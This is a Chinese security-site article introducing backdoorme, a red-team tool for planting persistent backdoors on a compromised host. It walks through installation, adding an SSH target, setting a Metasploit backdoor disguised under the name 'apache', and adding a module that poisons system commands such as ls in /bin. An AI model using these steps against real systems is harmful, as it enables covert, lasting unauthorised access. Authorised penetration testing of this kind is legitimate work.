Alpha_h4ck
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9

关于backdoorme
backdoorme是一款专为红队研究人员设计的自动化后门安全测试模块,广大安全研究人员和红队研究人员可以使用该工具实现渗透测试的持久化机制,并以此来测试目标系统的安全性,最终实现安全环境提升。
Metasploit可以帮助我们对目标系统环境进行安全渗透测试,但是当我们对目标设备执行完一次安全测试之后,想要再次访问目标设备,该怎么办呢?backdoorme便能够解决我们的问题。
backdoorme可以释放大量后门程序来帮助我们在目标设备中建立持久化机制,一旦跟目标设备建立了SSH连接,backdoorme的优势便出来了。但需要注意的是,backdoorme并不是一个能够获取root访问权限的工具。
请仅在获得明确许可的情况下使用backdoorme,该工具仅供安全测试和安全性提升使用,请不要将其用于其他目的。
工具安装
由于该工具基于Python 3.5+开发,因此我们首先需要在本地设备上安装并配置好Python 3.5+环境。接下来,广大研究人员可以使用下列命令将项目源码克隆至本地:
git clone https://github.com/Kkevsterrr/backdoorme.git
接下来,我们需要执行下列命令安装该工具所需的其他依赖组件:
$ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/ $ virtualenv --python=python3.5 env $ source env/bin/activate (env) $ pip install -r requirements.txt
工具使用
工具启动
启动backdoorme:
$ python master.py
添加目标:
>> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >>
后门功能
如需使用后门功能,可以直接运行“user”命令:
>> use shell/metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >>
这里我们可以设置一个持久化后门,并使用“show options”或“help”查看配置的参数列表,使用“set”命令可以直接设置要使用的参数:
(msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False ... (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ...
功能模块
每一个后门组件都支持添加额外的功能模块,使用“add”命令即可添加模块:
(msf) >> add poison + Poison module added
每一个模块都提供了额外的参数支持自定义功能:
(msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False
工具使用演示
许可证协议
本项目的开发与发布遵循MIT开源许可证协议。
项目地址
backdoorme:【GitHub传送门】
参考资料
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
